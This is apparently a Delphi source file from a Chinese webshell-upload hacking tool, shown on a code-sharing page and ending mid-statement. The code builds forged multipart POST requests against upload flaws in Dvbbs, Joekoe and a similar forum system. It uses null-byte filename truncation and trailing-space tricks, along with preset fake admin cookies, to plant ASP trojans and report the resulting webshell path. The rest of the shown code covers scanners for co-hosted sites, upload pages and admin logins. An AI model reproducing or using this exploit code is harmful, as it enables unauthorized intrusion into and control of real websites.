📄 mainunit.pas
字号:
Result := Result + 'Content-Disposition: form-data; name="file1"; filename="c:\' + MainForm.AspFilePath.Text + #0 + '.exe"' + H
else
Result := Result + 'Content-Disposition: form-data; name="file1"; filename="c:\' + ExtractFileName(MainForm.AspFilePath.Text) + #0 + '.exe"' + H;
end
else
begin {动力上传类型2}
if MainForm.RadPower2.Checked then
begin
Result := '';
Result := Result + '-----------------------------7d51c732705ec' + H;
Result := Result + 'Content-Disposition: form-data; name="FileName"; filename="C:\a.gif"' + H;
Result := Result + 'Content-Type: text/plain' + H + H;
Result := Result + GetAspFile + H + H;
Result := Result + '-----------------------------7d51c732705ec' + H;
Result := Result + 'Content-Disposition: form-data; name="FileName1"; filename="C:\up.asp "' + H;
Result := Result + 'Content-Type: text/plain' + H + H;
if MainForm.RdDefault.Checked then {如果是默认的asp木马}
Result := Result + GetAspFile + H + H
else
begin
ASPFile := TStringList.Create;
ASPFile.LoadFromFile(MainForm.AspFilePath.Text);
Result := Result + ASPFile.Text + H + H;
ASPFile.Free;
end;
Result := Result + '上传' + H;
Result := Result + '-----------------------------7d51c732705ec' + H;
Result := Result + 'Content-Disposition: form-data; name="PhotoUrlID"' + H + H;
Result := Result + '0' + H;
Result := Result + '-----------------------------7d51c732705ec--' + H;
Exit;
end;
end;
end;
if MainForm.Rd_Joekoe.Checked then {如果选中乔客上传}
Result := Result + 'Content-Disposition: form-data; name="file_name1"; filename="c:\nihao.gif"' + H;
if MainForm.RdCustom.Checked then {如果选中自定义上传类型 - 开始定义文件字段}
begin
if MainForm.RadFileName.Checked = False then
Result := Result + 'Content-Disposition: form-data; name="' + Trim(MainForm.EdFileField.Text) + '"; filename="c:\diy.' + MainForm.ComBoxType.Text + '"' + H
else
begin
if MainForm.RdDefault.Checked then
Result := Result + 'Content-Disposition: form-data; name="' + Trim(MainForm.EdFileField.Text) + '"; filename="c:\' + Trim(MainForm.AspFilePath.Text) + #0 + '.' + MainForm.ComBoxType.Text + '"' + H
else
Result := Result + 'Content-Disposition: form-data; name="' + Trim(MainForm.EdFileField.Text) + '"; filename="c:\' + ExtractFileName(MainForm.AspFilePath.Text) + #0 + '.' + MainForm.ComBoxType.Text + '"' + H;
end;
end;
Result := Result + 'Content-Type: text/plain' + H + H;
Result := Result + GetAspFile + H;
Result := Result + '-----------------------------7d22f8371b051c' + H;
Result := Result + 'Content-Disposition: form-data; name="fname"' + H + H;
Result := Result + 'D:\Newmm.gif' + H;
Result := Result + '-----------------------------7d22f8371b051c' + H;
Result := Result + 'Content-Disposition: form-data; name="Submit"' + H + H;
Result := Result + '上传' + H;
Result := Result + '-----------------------------7d22f8371b051c--' + H;
end;
procedure TMainForm.btnUpFileClick(Sender: TObject); {综合上传 - 上传ASP木马}
const
H = #13#10;
var
Url: string;
begin
if (Trim(EdPostAddr.Text) = '') or (Pos('.', EdPostAddr.Text) = 0) then {判断地址是否合格}
begin
application.MessageBox('请输入正确的上传地址!', '提示', 48);
Exit;
end;
Url := EdPostAddr.Text;
Url := StringReplace(Url, 'http://', '', [rfIgnoreCase]);
if Pos('/', Url) = 0 then
begin
application.MessageBox('请输入正确的上传地址!', '提示', 48);
Exit;
end;
try
if RdCustomASP.Checked then {如果选中自选asp木马}
if FileExists(AspFilePath.Text) = False then {当找不到asp文件的路径时提示}
begin
Application.MessageBox('找不到文件路径,请重新选择你所要上传的文件!', '错误提示', 64);
Exit;
end;
PostShell := ''; {初始化}
ClientSocket1.Close;
ClientSocket1.Host := GetHost(EdPostAddr.Text); {设置主机地址}
ClientSocket1.Port := 80; {设置端口}
if Rd_Dvbbs.Checked then {如果选中动网上传功能时}
begin
if RdDefault.Checked then {如果选中默认木马时}
EdShellPath.Text := GetHostDir(EdPostAddr.Text) + '/' + AspFilePath.Text
else
EdShellPath.Text := GetHostDir(EdPostAddr.Text) + '/' + ExtractFileName(AspFilePath.Text);
end // if Rd_Dvbbs.Checked
else
if Rd_FreePower.Checked then {如果选中动力上传功能时}
begin
if RadPower1.Checked then {如果选中动网上传功能 - 上传类型1}
begin
if RdDefault.Checked then {如果选中默认木马时}
EdShellPath.Text := GetHostDir(EdPostAddr.Text) + '/UploadSoft/' + AspFilePath.Text
else
EdShellPath.Text := GetHostDir(EdPostAddr.Text) + '/UploadSoft/' + ExtractFileName(AspFilePath.Text);
end
else
begin
if RadPower2.Checked then {否则}
EdShellPath.Text := '自己手动查找WEBSHELL路径!';
end;
end // if Rd_FreePower.Checked
else
if Rd_Joekoe.Checked then
begin
if RdDefault.Checked then
EdShellPath.Text := GetHostDir(EdPostAddr.Text) + '/upload/other/' + AspFilePath.Text
else
EdShellPath.Text := GetHostDir(EdPostAddr.Text) + '/upload/other/' + ExtractFileName(AspFilePath.Text);
end; // if Rd_Joekoe.Checked
PostShell := PostShell + 'POST ' + GetPostPage(EdPostAddr.Text) + ' HTTP/1.1' + H;
PostShell := PostShell + 'Referer: ' + EdPostAddr.Text + H;
PostShell := PostShell + 'Host: ' + GetHost(EdPostAddr.Text) + H;
PostShell := PostShell + 'Content-Length: ' + IntToStr(length(Dv_PostCdoe)) + H; {得到长度}
PostShell := PostShell + 'Cookie: ' + EdtCookies.Text + H + H;
PostShell := PostShell + Dv_PostCdoe + H;
ClientSocket1.Open; {打开}
except end;
end;
procedure TMainForm.ClientSocket1Connect(Sender: TObject; {综合上传 - 提交数据包}
Socket: TCustomWinSocket);
begin
Socket.SendText(PostShell); {发送}
end;
procedure TMainForm.ClientSocket1Read(Sender: TObject; {综合上传 - 接受服务器返回信息}
Socket: TCustomWinSocket);
begin
Memoinfo.Text := Socket.ReceiveText;
Memoinfo.Perform(WM_VSCROLL, SB_Bottom, 0);
if Pos('成功', Memoinfo.Text) > 1 then
begin
ClientSocket1.Active := False;
application.MessageBox('程序提示:已成功上传!', '提示', 64);
end;
end;
procedure TMainForm.ClientSocket1Error(Sender: TObject; {综合上传 - 处理异常错误}
Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
var ErrorCode: Integer);
begin
if ErrorCode = 11001 then
Application.MessageBox('请确认提交地址是否正确!', '提示', 64);
ErrorCode := 0;
Socket.Close;
ClientSocket1.Active := False;
end;
procedure TMainForm.Rd_DvbbsClick(Sender: TObject); {综合上传 - 选择上传的类型}
begin
LbShellAddr.Enabled := True;
EdShellPath.Enabled := True;
BtnOpenShell.Enabled := True;
GBPower.Visible := False;
GroupBox4.Visible := False;
Label43.Visible := False;
Label42.Visible := False;
Label36.Visible := False;
ComBoxType.Visible := False;
EdPathField.Visible := False;
EdFileField.Visible := False;
case TRadioButton(Sender).Tag of
0:
begin
LbHint.Caption := '漏洞页面: http://www.xxx.com/bbs/upfile.asp';
LbUpinfo.Caption := '动网上传功能介绍: 无需抓包,使用默认Cookies既可直接上传!若失败,请自行抓包填写Cookies!';
EdtCookies.Text := 'iscookies=0;';
end;
1:
begin
GBPower.Visible := True;
LbHint.Caption := '漏洞页面: http://www.xxx.com/upfile_soft.asp [软件] http://www.xxx.com/Upfile_SoftPic.asp [图片]';
LbUpinfo.Caption := '动力上传功能介绍: 无需抓包,使用默认Cookies既可直接上传!若失败,请自行抓包填写Cookies!';
EdtCookies.Text := 'asp163=Password=49ba59abbe56e057&UserLevel=999&UserName=hackdiy;';
end;
2:
begin
LbHint.Caption := '漏洞页面: http://www.xxx.com/upload.asp?action=upfile';
LbUpinfo.Caption := '乔客上传功能介绍: 无需抓包,使用默认Cookies既可直接上传!若失败,请自行抓包填写Cookies!';
EdtCookies.Text := 'joekoe%5Fonline=onlines=1&login%5Fpassword=49ba59abbe56e057&guest%5Fname=&iscookies=yes&login%5Fusername=hackdiy';
end;
3:
begin {选择自定义上传时执行}
LbHint.Caption := '';
LbUpinfo.Caption := '自定义上传功能介绍: 通过手动抓包,自定义路径字段和自定义文件字段,同时手动填写Coookies!';
LbShellAddr.Enabled := False;
EdShellPath.Enabled := False;
BtnOpenShell.Enabled := False;
GBPower.Visible := False;
EdShellPath.Clear;
EdtCookies.Clear;
GroupBox4.Visible := True;
Label43.Visible := True;
Label42.Visible := True;
Label36.Visible := True;
ComBoxType.Visible := True;
EdPathField.Visible := True;
EdFileField.Visible := True;
end;
end;
end;
procedure TMainForm.AspFilePathKeyPress(Sender: TObject; var Key: Char); {综合上传 - 设置文件名}
begin
if RdDefault.Checked then
begin
if not (key in ['0'..'9', 'a'..'z', 'A'..'Z', '.', #8, #9, #13]) then
key := #0;
end;
end;
procedure TMainForm.AspFilePathButtonClick(Sender: TObject); {综合上传 - 打开asp木马文件}
begin
if RdCustomASP.Checked then {自选asp木马}
begin
OpenFile.DefaultExt := 'asp';
OpenFile.Filter := 'asp文件 (*.asp)|*.asp|php文件 (*.php)|*.php|cgi文件 (*.cgi)|*.cgi|全部文件 (*.*)|*.*';
if OpenFile.Execute then
AspFilePath.Text := OpenFile.FileName;
end;
end;
procedure TMainForm.SiteListClick(Sender: TObject); {旁注检测 - 单击虚拟主机网站}
var
S: string;
begin
if SiteList.Items.Text = '' then Exit;
S := 'http://' + StringReplace(SiteList.Items[SiteList.Itemindex], ' √', '', [rfReplaceAll]);
EdURL.Text := S;
EdOtherSite.Text := S;
end;
procedure TMainForm.SiteListDblClick(Sender: TObject); {旁注检测 - 浏览虚拟主机网站}
var
TmpStr: string;
D: DWORD;
begin
if SiteList.Items.Text = '' then Exit;
PageControl2.TabIndex := 0;
TmpStr := StringReplace(SiteList.Items[SiteList.Itemindex], ' √', '', [rfReplaceAll]);
SiteList.Items[SiteList.Itemindex] := TmpStr + ' √';
EdURL.Text := 'http://' + TmpStr;
EdOtherSite.Text := 'http://' + TmpStr;
Webbrowser1.Navigate(TmpStr);
RzSplitter1.Percent := 89;
LbShowprogress.Caption := '读取连接地址中...';
BeginThread(nil, 0, @GetAlexa, nil, 0, D); {创建检测排名的线程}
end;
procedure TMainForm.N3Click(Sender: TObject);
begin
Close;
end;
procedure ExecuteData;
var
TableName: string;
begin
with MainForm do
begin
if RabUpFile.Checked then // 从数据库中删除
TableName := 'Scan_UpFile'
else
if RabDefaultData.Checked then
TableName := 'Scan_DefaultData'
else
if RabAdminLogin.Checked then
TableName := 'Scan_AdminLogin';
ADOQuery2.Close;
ADOQuery2.Sql.Text := 'select * from ' + TableName;
ADOQuery2.Open;
end;
end;
procedure TMainForm.BtnInsertClick(Sender: TObject); {扫描上传页面 - 插入 & 全选 & 反选 & 导入}
var
s: string;
b: boolean;
begin
try
case TButton(Sender).Tag of
0: begin
s := '';
b := inputquery('添加检测页面', '添加页面 ', s);
if b then
begin
if s[1] <> '/' then
begin
s := '/' + s;
ClbPage.Items.Add(s);
end
else
begin
if Length(s) < 2 then Exit;
ClbPage.Items.Add(s);
end;
ClbPage.ItemIndex := ClbPage.Count - 1; //选中最后一个
ClbPage.Checked[ClbPage.Count - 1] := True;
ExecuteData;
if RabUpFile.Checked then // 自动保存到数据库里面
ADOQuery2.AppendRecord([nil, S, '用户添加上传页面'])
else
if RabDefaultData.Checked then
ADOQuery2.AppendRecord([nil, S, '用户添加数据库'])
else
if RabAdminLogin.Checked then
ADOQuery2.AppendRecord([nil, S]);
end;
end;
1:
begin
if ClbPage.ItemIndex < 0 then
begin
Application.MessageBox('请先选择你要删除的页面!', '提示', 64);
Exit;
end;
ExecuteData;
if Application.MessageBox('你确定要删除该页面吗?', '提示', 32 + MB_YESNO) = 6 then
begin
ADOQuery2.RecNo := ClbPage.ItemIndex + 1;
ADOQuery2.Delete;
ClbPage.DeleteSelected;
end;
end;
end;
except
end;
end;
procedure TMainForm.btnLoadScanSiteClick(Sender: TObject); {扫描上传页面 - 载入部分}
var
i: integer;
b: Boolean;
s: string;
begin
case TSpeedButton(Sender).Tag of
0:
begin
if SiteList.Items.Text = '' then {载入查询网址}
ScanListBox.Items.Text := '没有发现任何网址,请查询完毕后再单击载入!'
else
begin
ScanListBox.Clear;
for i := 0 to SiteList.Count - 1 do
ScanList⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -